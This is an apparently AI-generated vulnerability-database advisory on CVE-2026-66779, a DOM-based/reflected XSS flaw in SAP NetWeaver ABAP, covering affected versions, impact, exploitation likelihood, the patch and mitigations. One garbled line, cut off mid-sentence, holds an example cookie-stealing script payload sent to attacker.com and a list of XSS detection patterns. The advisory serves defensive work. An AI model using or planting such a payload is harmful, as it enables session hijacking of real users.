
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-66779 is a DOM-based/Reflected Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Application Server ABAP. An authenticated attacker can craft a malicious link that, when accessed by another authenticated victim, causes injected input to be processed and reflected within the DOM during page rendering, executing malicious content in the victim's browser. Affected component versions include SAP_UI 754, 755, 756, 757, 758, 816; EP-FLP 7.50; SAP_BASIS 731; and AJAX-RUNTIME 7.50. The vulnerability was published on August 11, 2026, and carries a CVSS v3.1 base score of 6.3 (Medium) (GitHub Advisory).
The root cause is improper neutralization of user-controllable input before it is placed in output rendered as a web page (CWE-79). The attack vector is network-based and requires low privileges (an authenticated attacker account) and user interaction from an authenticated victim. The attacker crafts a malicious URL containing injected script content; when the victim navigates to this link, the application reflects the unsanitized input into the DOM on the client side, triggering execution of the attacker's JavaScript in the victim's browser context. The vulnerability is associated with CAPEC patterns including DOM-Based XSS (CAPEC-588) and Reflected XSS (CAPEC-591) (GitHub Advisory).
Successful exploitation results in high confidentiality impact and low integrity impact, with no effect on availability. An attacker can execute arbitrary JavaScript in the victim's browser context, enabling theft of session tokens, authentication credentials, or other sensitive data accessible to the victim. While the scope is unchanged (limited to the affected component), the ability to hijack authenticated sessions could facilitate unauthorized actions within the SAP NetWeaver environment on behalf of the victim (GitHub Advisory).
There is no evidence of public proof-of-concept exploit code or active in-the-wild exploitation at this time. The vulnerability is not automatable and requires both an authenticated attacker and user interaction from an authenticated victim, limiting its exploitability. The EPSS score is approximately 0.201%, indicating a low probability of exploitation within the next 30 days. The CVE is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (GitHub Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or equivalent encoded form).%3Cscript%3E, javascript:, onerror=, onload=) in query parameters or path segments.SAP has released a patch addressing this vulnerability, referenced in SAP Security Note 3721424, available via the SAP Support Portal. Organizations should apply the relevant SAP Security Patch Day updates for August 2026 to affected component versions (SAP_UI 754–816, EP-FLP 7.50, SAP_BASIS 731, AJAX-RUNTIME 7.50). As interim mitigations, implement strict Content Security Policy (CSP) headers to restrict script execution, enforce input validation and output encoding for all user-supplied data, and educate users to avoid clicking on unsolicited or untrusted SAP application links (GitHub Advisory, SAP Patch Day).
SAP's August 2026 Security Patch Day was covered by SAP security specialists including Onapsis and SecurityBridge, who published blog posts summarizing the patched vulnerabilities. RedRays also published analysis of the August 2026 SAP patch day. CyberSecurityNews reported on the broader set of SAP vulnerabilities addressed in this patch cycle, including code injection and memory corruption issues alongside this XSS finding (Onapsis Blog, SecurityBridge Blog, RedRays Blog, CyberSecurityNews).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."